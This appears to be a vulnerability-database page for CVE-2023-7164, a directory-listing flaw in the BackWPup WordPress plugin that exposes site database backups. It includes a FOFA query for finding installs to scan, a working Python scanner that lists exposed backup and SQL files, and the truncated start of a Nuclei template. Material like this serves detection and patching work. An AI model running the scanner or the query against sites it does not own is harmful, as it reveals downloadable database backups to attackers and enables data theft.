CVE-2023-7164
Published: 2024-04-08
Priority: P3 · 56
CVSS 3.1: 7.5 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 2.26% (80.8th percentile)
The BackWPup WordPress plugin before 4.0.4 does not prevent Directory Listing in its temporary backup folder, allowing unauthenticated attackers to download backups of a site's database.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| inpsyde | backwpup | < 4.0.4 | 4.0.4 |
Detection & IOCs (extracted from sources)
- yara regex: `backwpup-[a-f0-9]{6}-(backups|temp)`
- yara regex: `[\w\-\.]+\.(tar\.gz|tar|zip|sql)`
- Probe for directory listing exposure of the BackWPup temporary/backup folder under /wp-content/uploads/. The folder name matches `backwpup-[a-f0-9]{6}-(backups|temp)`; a 200 response whose body contains "Index of" together with a folder name matching that pattern confirms the vulnerability. A bare "Index of" listing that shows no such folder is a generic web-server autoindex misconfiguration, not this CVE.
- After identifying the exposed backup folder, check it for downloadable backup files whose names match the extensions `.tar.gz`, `.tar`, `.zip` or `.sql`. An HTTP 200 for any of them confirms unauthenticated disclosure of a backup file.
- Use the FOFA query `body="/wp-content/plugins/backwpup/"` to identify internet-facing WordPress instances with the BackWPup plugin installed for targeted scanning. Plugin presence alone does not establish an affected version; the listing probe above is the actual test.
- The exploit requires no authentication: a single unauthenticated HTTP GET to the exposed backup folder path is sufficient.
- Only BackWPup versions strictly below 4.0.4 are affected; instances running 4.0.4 or later are not.
- The exposed path is specifically the plugin's temporary backup folder under wp-content/uploads/, not the entire uploads directory; detection should focus on the `backwpup-[a-f0-9]{6}-(backups|temp)` subdirectory pattern.
- The Nuclei template uses stop-at-first-match across four common WordPress base path variants (/wp-content/uploads/, /blog/wp-content/uploads/, /wordpress/wp-content/uploads/, /wp/wp-content/uploads/). Installs under non-standard paths will be missed by that list, so scanners should add the site's real base path when it is known.
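The two-step check described above, written out as a stand-alone script. This is an added example and not code from the page, the Nuclei project or the BackWPup vendor; it reuses the page's two IOC regexes and the template's four base paths, and it assumes a directory listing at the uploads base path reveals the `backwpup-…` folder name (an attacker does not know the 6-hex-character hash in advance). The sample listings embedded at the bottom are constructed for offline checking, and the User-Agent string is arbitrary.

```python
import re
import sys
from html.parser import HTMLParser
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Folder-name and backup-file patterns taken from the page's IOC list.
FOLDER_RE = re.compile(r"backwpup-[a-f0-9]{6}-(?:backups|temp)")
BACKUP_FILE_RE = re.compile(r"[\w\-.]+\.(?:tar\.gz|tar|zip|sql)", re.IGNORECASE)

# The four base paths the Nuclei template probes (stop-at-first-match).
BASE_PATHS = [
    "/wp-content/uploads/",
    "/blog/wp-content/uploads/",
    "/wordpress/wp-content/uploads/",
    "/wp/wp-content/uploads/",
]


class _HrefCollector(HTMLParser):
    """Collects href attributes of <a> tags from an autoindex page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def extract_hrefs(body):
    parser = _HrefCollector()
    parser.feed(body)
    return parser.hrefs


def is_exposed_listing(status, body):
    """Step 1: HTTP 200, an 'Index of' listing, and a BackWPup folder name in it.
    A listing with no such folder is a generic autoindex, not this CVE."""
    return status == 200 and "Index of" in body and FOLDER_RE.search(body) is not None


def backwpup_folders(body):
    """Unique BackWPup folder names visible in a listing body."""
    return sorted(set(FOLDER_RE.findall(body)))


def backup_files(body):
    """Step 2: link targets whose last path component is a backup archive or SQL dump."""
    found = set()
    for href in extract_hrefs(body):
        name = href.split("?", 1)[0].rstrip("/").rsplit("/", 1)[-1]
        if BACKUP_FILE_RE.fullmatch(name):
            found.add(name)
    return sorted(found)


def fetch(url, timeout=10):
    """GET url -> (status, body). Non-200 gives (code, ''); connection failure gives (None, '')."""
    req = Request(url, headers={"User-Agent": "cve-2023-7164-check"})  # arbitrary UA
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(2_000_000).decode("utf-8", "replace")
    except HTTPError as exc:
        return exc.code, ""
    except URLError:
        return None, ""


def scan(target):
    """Probe each base path; at the first exposed listing, enumerate backup files in
    every BackWPup folder it reveals. Returns [(folder_url, [file names]), ...]."""
    target = target.rstrip("/")
    findings = []
    for base in BASE_PATHS:
        status, body = fetch(target + base)
        if not is_exposed_listing(status, body):
            continue
        for folder in backwpup_folders(body):
            folder_url = target + base + folder + "/"
            f_status, f_body = fetch(folder_url)
            findings.append((folder_url, backup_files(f_body) if f_status == 200 else []))
        break  # mirror the template's stop-at-first-match
    return findings


# Constructed sample listings (not captured from any real site) for offline checks.
SAMPLE_UPLOADS_LISTING = """<html><head><title>Index of /wp-content/uploads/</title></head>
<body><h1>Index of /wp-content/uploads/</h1>
<a href="../">../</a> <a href="2024/">2024/</a>
<a href="backwpup-1a2b3c-backups/">backwpup-1a2b3c-backups/</a>
<a href="backwpup-1a2b3c-temp/">backwpup-1a2b3c-temp/</a></body></html>"""
SAMPLE_FOLDER_LISTING = """<html><body><h1>Index of /wp-content/uploads/backwpup-1a2b3c-backups/</h1>
<a href="../">../</a>
<a href="backwpup_1a2b3c_2024-03-01_02-00-00.tar.gz">backwpup_1a2b3c_2024-03-01_02-00-00.tar.gz</a>
<a href="example-db.sql">example-db.sql</a> <a href="index.php">index.php</a></body></html>"""

if __name__ == "__main__":
    for folder_url, files in scan(sys.argv[1]):
        print(f"[+] exposed listing: {folder_url}")
        for name in files:
            print(f"    backup file: {folder_url}{name}")
```

Run it as `python3 check.py https://target.example` (hostname is a placeholder). Only directory-listing responses and file names are read; the script never downloads a backup, which is enough to confirm exposure without pulling a database dump onto the scanning host.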
No detection rules found.
Nuclei
CVE-2023-7164 [HIGH] WordPress BackWPup < 4.0.4 - Backup File Disclosure (nuclei · CVSS 7.5)
Template:
```yaml
id: CVE-2023-7164
info:
  name: WordPress BackWPup < 4.0.4 - Backup File Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    BackWPup WordPress plugin < 4.0.4 contains a directory listing vulnerability caused by lack of access restrictions in its temporary backup folder, letting unauthenticated attackers download site backups, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can download site backups, potentially leading to data theft or further exploitation.
  rem
```
No writeups or analysis indexed.